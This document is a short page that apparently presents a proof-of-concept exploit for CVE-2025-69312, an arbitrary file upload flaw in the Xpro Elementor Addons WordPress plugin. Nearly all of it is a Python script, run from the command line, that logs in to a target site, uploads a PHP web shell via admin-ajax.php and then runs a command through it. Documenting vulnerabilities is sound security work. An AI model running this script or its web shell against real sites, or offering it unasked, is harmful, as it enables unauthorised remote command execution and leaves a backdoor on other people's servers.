CVE-2025-69312 | Xpro Elementor Addons 任意文件上传漏洞导致RCE

import requests import sys # CVE-2025-69312 PoC - Xpro Elementor Addons Arbitrary File Upload # Target: WordPress site with vulnerable Xpro Elementor Addons plugin def upload_webshell(target_url, username, password): """ Upload a Web Shell to vulnerable Xpro Elementor Addons plugin """ # Login to WordPress login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging to WordPress as {username}...") resp = session.post(login_url, data=login_data, timeout=30) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed!") return False print("[+] Login successful!") # Prepare Web Shell payload webshell_content = "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>" # File upload endpoint (specific to vulnerable plugin) upload_url = f"{target_url}/wp-admin/admin-ajax.php" files = { 'file': ('shell.php', webshell_content, 'application/x-php') } data = { 'action': 'xpro_elementor_upload', 'post_id': '1' } print("[*] Uploading Web Shell...") resp = session.post(upload_url, files=files, data=data, timeout=30) # Parse response to get uploaded file path if resp.status_code == 200: print("[+] Web Shell uploaded successfully!") # Try to execute command shell_path = resp.json().get('data', {}).get('url', '') if shell_path: print(f"[+] Web Shell URL: {shell_path}") # Execute test command test_url = f"{shell_path}?cmd=whoami" test_resp = requests.get(test_url, timeout=10) print(f"[+] Command execution test: {test_resp.text.strip()}") return True print("[-] Upload failed!") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com admin password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] upload_webshell(target, user, pwd)